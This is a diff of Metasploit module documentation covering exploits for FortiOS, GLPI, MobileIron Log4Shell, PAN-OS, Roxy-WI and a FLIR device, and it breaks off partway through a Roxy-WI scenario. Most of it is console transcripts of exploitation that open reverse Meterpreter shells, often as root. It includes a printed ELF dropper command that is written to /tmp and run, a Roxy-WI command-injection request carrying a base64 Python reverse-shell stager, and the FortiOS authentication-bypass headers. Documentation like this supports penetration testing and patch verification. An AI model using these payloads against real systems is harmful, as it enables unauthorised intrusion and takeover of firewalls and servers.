+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited!
+[*] Performing command injection test issuing a sleep command of 7 seconds.
+[*] Elapsed time: 7.929586360999565 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Linux Dropper
+[*] Using URL: http://0.0.0.0:8080/GOCjBdalaU
+[*] Client 127.0.0.1 (curl/7.33.0) requested /GOCjBdalaU
+[*] Sending payload to 127.0.0.1 (curl/7.33.0)
+[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:56540) at 2022-10-21 07:02:57 +0000
+[*] Command Stager progress - 100.00% done (125/125 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.100.180
+OS           :  (Linux neco 3.0.35-flir)
+Architecture : armv7l
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+meterpreter > getuid
+Server username: root
+meterpreter >
+```
+
+## Limitations
+Staged payloads like `linux/armle/meterpreter/reverse_tcp` or `linux/armle/shell/reverse_tcp` do not work.
+Manually tested these payloads with `msfvenom`, but they produce segmentation faults when executed on the target.
+However stageless payloads such as `linux/armle/meterpreter_reverse_tcp` and `linux/armle/shell_reverse_tcp` are working.
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+An authentication bypass using an alternate path or channel vulnerability [CWE-288] in FortiOS (firewall)
+FortiProxy (web proxy), and FortiSwitch Manager products. The vulnerability allows remote, unauthenticated user to
+bypass authentication and gain access to the administrative interface of these products by using a specially
+crafted http/s request.
+
+On October 3, 2022, Fortinet released a software update that addressed this vulnerability (CVE-2022-40684).
+
+The following products are affected:
+
+- FortiOS 7.0.0 to 7.0.6
+- FortiOS 7.2.0 to 7.2.1
+- FortiProxy 7.0.0 to 7.0.6
+- FortiProxy 7.2.0
+- FortiSwitchManager 7.0.0
+- FortiSwitchManager 7.2.0
+
+### Exploitation
+
+This module will abuse the authentication bypass vulnerability in the affected products to add a new ssh public
+key in the authorized keys of the target user (if no user is provied it'll try to detect it) and then connect
+over ssh to the target system (if no ssh private key is provided this module will automatically generate one).
+
+To do so it will add the following header in all HTTP requests:
+```
+User-Agent: Report Runner
+Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
+```
+
+This module doesn't intend to overwrite the ssh keys already configured in the target system, it intends to
+**add** a new key in the last slot, if it is available or overwriting it.
+
+Even though the `check` detects the system as vulnerable, it performs a further validation if the ssh port is open and will fail otherwise.
+
+After a successful exploitation it will remove the just added key as a clean-up process. We assume it is the last key.
+
+## Verification Steps
+Confirm that functionality works:
+
+1. Start `msfconsole`
+1. `use exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684`
+1. set `RHOSTS`
+1. set `HttpTrace true` (optional)
+1. set `SSH_DEBUG true` (optional)
+1. set `VERBOSE true` (optional)
+1. `exploit`
+1. Confirm you have now a cmd session
+
+## Options
+
+### TARGETURI (required)
+
+The path to the Fotigate API (Default: `/`).
+
+### USERNAME (required)
+
+The username of the targed user (Default: `admin`).
+
+### PRIVATE_KEY (optional)
+
+The path for the SSH private key to be used to authenticate. It must be in PEM format.
+
+Example how to generate it:
+```
+ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`
+```
+
+### KEY_PASS (optional)
+
+The password for a given SSH private key (if it has one).
+
+### SSH_RPORT (required)
+
+The SSH port to connnect to (Default: `22`)
+
+## Scenarios
+
+### vulnerable application version and OS
+This module has been tested successfully on FortiGate v7.2.0.
+
+```
+msf6 exploit(linux/http/fortinet_authentication_bypass_cve_2022_40684) > exploit 
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking XXX.XXX.XXX.XXX:443
+[+] The target appears to be vulnerable. Target seems vulnerable
+[*] Executing exploit on Interactive SSH
+[*] Establishing SSH connection
+[*] SSH session 1 opened (172.25.226.18:38791 -> XXX.XXX.XXX.XXX:22) at 2022-10-15 04:00:41 +0200
+
+FW01 #  get sys status
+Version: FortiGate-100F v7.2.0,build1157,220331 (GA.F)
+Firmware Signature: certified 
+```
@@ -19,6 +19,7 @@ For testing purposes, you can download a Github Enterprise image from the follow

 This module was specifically tested against version 2.8.0, which can be downloaded here:

+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
 [https://github-enterprise.s3.amazonaws.com/esx/releases/github-enterprise-2.8.0.ova](https://github-enterprise.s3.amazonaws.com/esx/releases/github-enterprise-2.8.0.ova)

 Before you install the image, you must have a valid key. Start from here:
@@ -0,0 +1,146 @@
+## Vulnerable Application
+
+GLPI versions 10.0.2 and below expose a vulnerable version on htmLawed which
+has a php command injection opportunity.
+
+### Installation Instructions
+Taken verbatim from https://www.imaginelinux.com/install-glpi-ubuntu/
+Using  Ubuntu x64 Desktop 20.04.1
+1. ```sudo apt install apache2 php7.4 php7.4-curl php7.4-zip php7.4-gd php7.4-intl \
+   php7.4-intl php-pear php7.4-imagick php-bz2 php7.4-imap php-memcache php7.4-pspell \
+   php7.4-tidy php7.4-xmlrpc php7.4-xsl php7.4-mbstring php7.4-ldap php-cas php-apcu \
+   libapache2-mod-php7.4 php7.4-mysql mariadb-server```
+2. `sudo systemctl status apache2`
+3. `sudo systemctl status mariadb`
+4. `sudo mysql_secure_installation` # Answer 'yes' to everything
+5. `sudo mysql -u root -p`
+6. `CREATE DATABASE glpidb;`
+7. `GRANT ALL PRIVILEGES ON glpidb.* TO 'user'@'localhost' IDENTIFIED BY 'password';`
+8. `FLUSH PRIVILEGES;`
+9. `exit;`
+10. Grab a vulnerable version here: https://github.com/glpi-project/glpi/releases/
+11. Extract that vulnerable version and move the files to `/var/www/html/glpi/`
+12. `sudo chmod 755 -R /var/www/html/`
+13. `sudo chown www-data:www-data -R /var/www/html/`
+14. Create a virtual host if you want `sudo nano /etc/apache2/sites-available/glpi.conf`
+```<VirtualHost *:80>
+   ServerAdmin admin@your_domain.com
+   DocumentRoot /var/www/html/glpi
+   ServerName your-domain.com
+
+   <Directory /var/www/html/glpi>
+        Options FollowSymlinks
+        AllowOverride All
+        Require all granted
+   </Directory>
+
+   ErrorLog ${APACHE_LOG_DIR}/your-domain.com_error.log
+   CustomLog ${APACHE_LOG_DIR}/your-domain.com_access.log combined
+
+</VirtualHost>
+```
+
+15. `sudo ln -s /etc/apache2/sites-available/glpi.conf /etc/apache2/sites-enabled/glpi.conf`
+16. `sudo a2enmod rewrite`
+17. `sudo systemctl restart apache2`
+18. Visit the new server at http://<yourhost>/glpi
+19. Follow setup instructions on screen
+
+## Options
+No extra options to be set, but make sure the uripath is correct
+
+## Verification Steps
+* Do: `msfconsole`
+* Do: `use exploit/linux/http/glpi_htmlawed_php_injection`
+* Do: `set upripath <uripath>`
+* Do: `set rhost <rhost>`
+* Do: `set lhost <lhost>`
+* Do: **Verify** you get a session
+
+## Scenarios
+### Using GLPI 9.5.9 running on Ubuntu 20.04.1 x64
+#### Linux Dropper
+```
+msf6 exploit(linux/http/glpi_htmlawed_php_injection) > show options
+
+Module options (exploit/linux/http/glpi_htmlawed_php_injection):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   10.5.132.190     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH  /glpi/glpi/      no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.109     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux (Dropper)
+
+
+msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run
+
+[*] Started reverse TCP handler on 10.5.135.109:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] token = 4578e2880dfc8091a10c38ea60ead228
+[*] sid = vitn15j8j9f0lljrfu7daq9es8
+[+] The target appears to be vulnerable.
+[*] Executing Linux (Dropper) for linux/x64/meterpreter/reverse_tcp
+[*] Generated command stager: ["printf '\\177\\105\\114\\106\\2\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\76\\0\\1\\0\\0\\0\\170\\0\\100\\0\\0\\0\\0\\0\\100\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\100\\0\\70\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\7\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\100\\0\\0\\0\\0\\0\\0\\0\\100\\0\\0\\0\\0\\0\\372\\0\\0\\0\\0\\0\\0\\0\\174\\1\\0\\0\\0\\0\\0\\0\\0\\20\\0\\0\\0\\0\\0\\0\\110\\61\\377\\152\\11\\130\\231\\266\\20\\110\\211\\326\\115\\61\\311\\152\\42\\101\\132\\262\\7\\17\\5\\110\\205\\300\\170\\121\\152\\12\\101\\131\\120\\152\\51\\130\\231\\152\\2\\137\\152\\1\\136\\17\\5\\110\\205\\300\\170\\73\\110\\227\\110\\271\\2\\0\\21\\134\\12\\5\\207\\155\\121\\110\\211\\346\\152\\20\\132\\152\\52\\130\\17\\5\\131\\110\\205\\300\\171\\45\\111\\377\\311\\164\\30\\127\\152\\43\\130\\152\\0\\152\\5\\110\\211\\347\\110\\61\\366\\17\\5\\131\\131\\137\\110\\205\\300\\171\\307\\152\\74\\130\\152\\1\\137\\17\\5\\136\\152\\176\\132\\17\\5\\110\\205\\300\\170\\355\\377\\346'>>/tmp/bLaTw ; chmod +x /tmp/bLaTw ; /tmp/bLaTw ; rm -f /tmp/bLaTw"]
+[*] execute_command
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045348 bytes) to 10.5.132.190
+[*] Command Stager progress - 100.00% done (809/809 bytes)
+[*] Meterpreter session 4 opened (10.5.135.109:4444 -> 10.5.132.190:36378) at 2022-10-19 17:05:28 -0500
+
+meterpreter > sysinfo
+Computer     : 10.5.132.190
+OS           : Ubuntu 20.04 (Linux 5.15.0-52-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+```
+
+#### Unix Command
+```
+[*] 10.5.132.190 - Meterpreter session 4 closed.  Reason: Died
+smsf6 exploit(linux/http/glpi_htmlawed_php_injection) > set target 0
+target => 0
+msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set payload cmd/unix/python/meterpreter/reverse_tcp
+payload => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run
+
+[*] Started reverse TCP handler on 10.5.135.109:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] token = 154f788cf9a685dac8753df78c6c3a1c
+[*] sid = 1mcp7n5vq9v6tnqlbm324qk9ce
+[+] The target appears to be vulnerable.
+[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[*] execute_command
+[*] Sending stage (40168 bytes) to 10.5.132.190
+[*] Meterpreter session 5 opened (10.5.135.109:4444 -> 10.5.132.190:39622) at 2022-10-19 17:06:36 -0500
+
+meterpreter > sysinfo
+Computer        : ubuntu-20041
+OS              : Linux 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+```
@@ -2,8 +2,9 @@

 Download the vulnerable version of OVA or ISO file from following URL. I strongly suggest you to choose OVA.

-[http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova](http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova)
-[http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso](http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso)
+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
+http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova
+http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso

 ### Creating A Testing Environment

@@ -76,4 +77,4 @@ dns-nameservers 8.8.8.8
 meterpreter > getuid
 Server username: root
 meterpreter >
-```
+```
@@ -0,0 +1,112 @@
+## Vulnerable Application
+
+### Description
+MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server
+will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS
+command execution in the context of the tomcat user.
+
+This module will start an LDAP server that the target will need to connect to.
+
+### Setup
+Once MobileIron Core is installed, no configuration needs to take place. The application is vulnerable out of the box.
+
+### MobileIron Core Appliance ISO Installation on VMWare Fusion
+
+1. Obtain a `mobileiron-##.#.#.#-##.iso` file, the following steps utilize `mobileiron-10.6.0.0-23.iso`.
+2. Use the ISO to create "A New Virtual Machine".
+3. Customize the VM settings to your liking. I gave the VM 4gb RAM, 4 cores, and changed the network adapter to a bridged mode
+so that I can hit it over the network.
+4. Boot the new virtual machine.
+5. Type `vm-install` at the `boot:` prompt.
+6. Wait patiently while the VM reboots and begins the install process. The system *will* reboot when installation completes.
+7. When prompted with `Continue with configuration dialog?`, type `yes`
+8. Type `q` to clear the license from the screen.
+9. Accept the End User License Agreement by typing `yes`
+10. Enter a Company Name / contact / email of your choosing. They don't matter.
+11. Configure an enable password (e.g. `Labpass1`)
+12. Enter an admin user name (e.g. `albinolobster`)
+13. Enter and confirm an admin password (e.g. `Labpass1`)
+14. Select `a` for the management interface
+15. Assign a static IP address and network mask that works with your test network. (e.g. `10.9.49.101` and `255.255.255.0`)
+16. Enter your test networks default gateway (e.g. `10.9.49.1`)
+17. Enter a fully-qualified domain name for the device (e.g. `lobster.example.com`). Unfortunately, this needs to work. I added a
+static DNS enty to my lab network's router.
+18. Enter your desired name server. My lab network relies on the aforementioned router (e.g. `10.9.49.1`)
+19. Enter blank entries for name server 2 and 3.
+20. `yes` to enable remote shell access (why not, right?)
+21. `no` to configuring NTP
+22. `no` to configuring system clock
+23. `yes` to commit changes
+24. Type `reload` to restart the system and `yes`, when prompted, to both saving the configuration and proceeding with the reload
+25. When the system has restarted, you should now have a vulnerable install of MobileIron Core.
+26. Visit `https://ipaddr` to ensure the HTTP server has fully loaded
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/linux/http/mobileiron_core_log4shell`
+3. Set the `RHOSTS`, `LHOST`, and `SRVHOST`
+4. Do: `run`
+5. If the target is vulnerable, the payload should be executed
+
+## Options
+
+## Scenarios
+
+### MobileIron Core 11.2.0.0-31
+
+```
+msf6 > use exploit/linux/http/mobileiron_core_log4shell
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
+LHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
+SRVHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
+SRVPORT => 1389
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.100
+RHOSTS => 10.9.49.100
+msf6 exploit(linux/http/mobileiron_core_log4shell) > run
+
+[*] Started reverse TCP handler on 10.9.49.248:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.100:48004) at 2022-07-29 09:46:14 -0700
+[*] Server stopped.
+
+id
+uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
+uname -a
+Linux hackercat.example.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### MobileIron Core 10.6.0.0-23
+
+```
+msf6 > use exploit/linux/http/mobileiron_core_log4shell
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
+LHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
+SRVHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
+SRVPORT => 1389
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.101
+RHOSTS => 10.9.49.101
+msf6 exploit(linux/http/mobileiron_core_log4shell) > run
+
+[*] Started reverse TCP handler on 10.9.49.248:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.101:35304) at 2022-07-29 10:19:58 -0700
+[*] Server stopped.
+
+id
+uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
+uname -a
+Linux lobster.example.com 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 10.9.49.101 - Command shell session 1 closed.
+```
@@ -0,0 +1,53 @@
+## Vulnerable Application
+
+This module exploits CVE-2020-2038, an authenticated OS Command Injection vulnerability in PAN-OS versions < 10.0.1,
+< 9.1.4 and <9.0.10 that allows authenticated administrators to execute arbitrary OS commands with root privileges. The
+Rest API allows authenticated users to send operational mode commands via the "op" request. Insufficient filtering of
+user inputs in the "op" request allows an attacker to inject commands.
+
+A Palo Alto Firewall demo VM can be requested at the following
+[link](https://www.paloaltonetworks.com/company/request-demo). PAN‑OS is the software that runs all Palo Alto Networks
+next-generation firewalls. PAN-OS will be running on the VM by default. The only setup necessary should be setting the
+administrator password.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/panos_auth_rce`
+1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### PAN-OS 10.0.0
+```
+msf6 > use linux/http/panos_auth_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/panos_auth_rce) > set rhosts 192.168.2.196
+rhosts => 192.168.2.196
+msf6 exploit(linux/http/panos_auth_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/panos_auth_rce) > set PASSWORD N0tpassword!
+PASSWORD => N0tpassword!
+msf6 exploit(linux/http/panos_auth_rce) > run
+
+[*] Started reverse TCP handler on 192.168.2.114:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating...
+[+] Successfully obtained api key
+[+] The target is vulnerable.
+[*] Exploiting...
+[*] Sending stage (989032 bytes) to 192.168.2.196
+[*] Meterpreter session 1 opened (192.168.2.114:4444 -> 192.168.2.196:52592) at 2022-08-17 16:13:19 -0400
+[*] Command Stager progress - 100.00% done (1111/1111 bytes)
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : PA-VM-10-0-0.home
+OS           : Red Hat  (Linux 3.10.0-957.21.3.10.pan.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,392 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0.
+Successful exploitation results in remote code execution under the context of the web server user.
+
+Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.
+
+### Setup
+
+Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
+
+First grab a vulnerable copy of the code from the release pages at https://github.com/hap-wi/roxy-wi/releases.
+You will likely want to grab version 6.1.0.0 from https://github.com/hap-wi/roxy-wi/archive/refs/tags/v6.1.0.0.tar.gz
+
+Next follow the installation instructions at https://roxy-wi.org/installation.py#manual and be sure to replace `apache`
+with `www-data` where applicable if your using Debian or Ubuntu (they call this out in their instructions however
+it can be a bit hard to find which is why I'm noting it here).
+
+Once you are done you should have a working copy of Roxy-Wi. Note that for some reason the login page didn't work for me
+in testing, however everything needed to test this module should be set up and operating as expected.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/roxy_wi_exec`
+4. Set `RHOST` to the address of the target Roxy-WI machine.
+5. Set `LHOST` to the address of your attacking machine.
+8. Run `exploit`
+9. Do: `run`
+10. You should get a shell as the user running the Roxy-WI server.
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Options
+
+### TARGETURI
+
+The base path to Roxy-WI. The default value is `/`.
+
+## Scenarios
+
+### Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Unix In-Memory Target
+
+```
+    msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec 
+    [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+    msf6 exploit(linux/http/roxy_wi_exec) > show options
+    
+    Module options (exploit/linux/http/roxy_wi_exec):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       Proxies                     no        A proxy chain of format type:host:port[,type:hos
+                                             t:port][...]
+       RHOSTS                      yes       The target host(s), see https://github.com/rapid
+                                             7/metasploit-framework/wiki/Using-Metasploit
+       RPORT      443              yes       The target port (TCP)
+       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
+                                             . This must be an address on the local machine o
+                                             r 0.0.0.0 to listen on all addresses.
+       SRVPORT    8080             yes       The local port to listen on.
+       SSL        true             no        Negotiate SSL/TLS for outgoing connections
+       SSLCert                     no        Path to a custom SSL certificate (default is ran
+                                             domly generated)
+       TARGETURI  /                yes       The URI of the vulnerable instance
+       URIPATH                     no        The URI to use for this exploit (default is rand
+                                             om)
+       VHOST                       no        HTTP server virtual host
+    
+    
+    Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+    
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       0   Unix (In-Memory)
+    
+    
+    msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
+    RHOST => 127.0.0.1
+    msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
+    HttpTrace => true
+    msf6 exploit(linux/http/roxy_wi_exec) > run
+    
+    [*] Started reverse TCP handler on 172.22.230.145:4444 
+    [*] Running automatic check ("set AutoCheck false" to disable)
+    [*] Checking if 127.0.0.1:443 is vulnerable!
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 93
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=iufmgha&backend_server=127.0.0.1
+    ####################
+    # Response:
+    ####################
+    HTTP/1.1 200 OK
+    Date: Mon, 25 Jul 2022 18:46:55 GMT
+    Server: Apache/2.4.52 (Ubuntu)
+    Vary: Accept-Encoding
+    Transfer-Encoding: chunked
+    Content-Type: text/html; charset=UTF-8
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    
+    [*] 127.0.0.1:443 is vulnerable!
+    [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
+    [*] Exploiting...
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 760
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20echo%20exec\%28__import__\%28\%27base64\%27\%29.b64decode\%28__import__\%28\%27codecs\%27\%29.getencoder\%28\%27utf-8\%27\%29\%28\%27aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3Mi4yMi4yMzAuMTQ1Jyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc%2bSScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSkK\%27\%29\%5b0\%5d\%29\%29%20%7c%20exec%20%24%28which%20python%20%7c%7c%20which%20python3%20%7c%7c%20which%20python2%29%20-%20%3b%23&alert_consumer=gumovpt&backend_server=127.0.0.1
+    [*] Sending stage (40164 bytes) to 172.22.230.145
+    [*] Meterpreter session 1 opened (172.22.230.145:4444 -> 172.22.230.145:41506) at 2022-07-25 13:46:56 -0500
+    ####################
+    # Response:
+    ####################
+    No response received
+    
+    meterpreter > getuid
+    Server username: www-data
+    meterpreter > sysinfo
+    Computer     : gwillcox-Virtual-Machine
+    OS           : Linux 5.15.0-41-generic #44-Ubuntu SMP Wed Jun 22 14:20:53 UTC 2022
+    Architecture : x64
+    Meterpreter  : python/linux
+    meterpreter > pwd
+    /var/www/haproxy-wi/app
+    meterpreter > ls
+    Listing: /var/www/haproxy-wi/app
+    ================================
+    
+    Mode              Size    Type  Last modified              Name
+    ----              ----    ----  -------------              ----
+    100664/rw-rw-r--  83      fil   2022-06-30 02:43:57 -0500  .htaccess
+    040755/rwxr-xr-x  4096    dir   2022-07-25 13:36:33 -0500  __pycache__
+    100775/rwxrwxr-x  12822   fil   2022-06-30 02:43:57 -0500  add.py
+    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  certs
+    100775/rwxrwxr-x  4745    fil   2022-06-30 02:43:57 -0500  config.py
+    100775/rwxrwxr-x  33194   fil   2022-06-30 02:43:57 -0500  create_db.py
+    100775/rwxrwxr-x  14945   fil   2022-06-30 02:43:57 -0500  db_model.py
+    100775/rwxrwxr-x  64688   fil   2022-06-30 02:43:57 -0500  funct.py
+    100775/rwxrwxr-x  913     fil   2022-06-30 02:43:57 -0500  ha.py
+    100775/rwxrwxr-x  8544    fil   2022-06-30 02:43:57 -0500  hapservers.py
+    100775/rwxrwxr-x  3008    fil   2022-06-30 02:43:57 -0500  history.py
+    100775/rwxrwxr-x  7145    fil   2022-06-30 02:43:57 -0500  login.py
+    100775/rwxrwxr-x  1696    fil   2022-06-30 02:43:57 -0500  logs.py
+    100775/rwxrwxr-x  1598    fil   2022-06-30 02:43:57 -0500  metrics.py
+    100775/rwxrwxr-x  966     fil   2022-06-30 02:43:57 -0500  nettools.py
+    100775/rwxrwxr-x  181104  fil   2022-06-30 02:43:57 -0500  options.py
+    100775/rwxrwxr-x  4096    fil   2022-06-30 02:43:57 -0500  overview.py
+    100775/rwxrwxr-x  1884    fil   2022-06-30 02:43:57 -0500  portscanner.py
+    100775/rwxrwxr-x  1125    fil   2022-06-30 02:43:57 -0500  provisioning.py
+    100644/rw-r--r--  274432  fil   2022-07-25 13:41:13 -0500  roxy-wi.db
+    100775/rwxrwxr-x  750     fil   2022-06-30 02:43:57 -0500  runtimeapi.py
+    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  scripts
+    100775/rwxrwxr-x  2486    fil   2022-06-30 02:43:57 -0500  sections.py
+    100775/rwxrwxr-x  1580    fil   2022-06-30 02:43:57 -0500  servers.py
+    100775/rwxrwxr-x  1826    fil   2022-06-30 02:43:57 -0500  smon.py
+    100775/rwxrwxr-x  103924  fil   2022-06-30 02:43:57 -0500  sql.py
+    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  templates
+    100775/rwxrwxr-x  1361    fil   2022-06-30 02:43:57 -0500  users.py
+    100775/rwxrwxr-x  4150    fil   2022-06-30 02:43:57 -0500  versions.py
+    100775/rwxrwxr-x  2076    fil   2022-06-30 02:43:57 -0500  viewlogs.py
+    100775/rwxrwxr-x  1150    fil   2022-06-30 02:43:57 -0500  viewsttats.py
+    100775/rwxrwxr-x  1819    fil   2022-06-30 02:43:57 -0500  waf.py
+    
+    meterpreter > 
+```
+
+### Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Linux Dropper Target
+
+```
+    msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec 
+    [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+    msf6 exploit(linux/http/roxy_wi_exec) > show options
+    
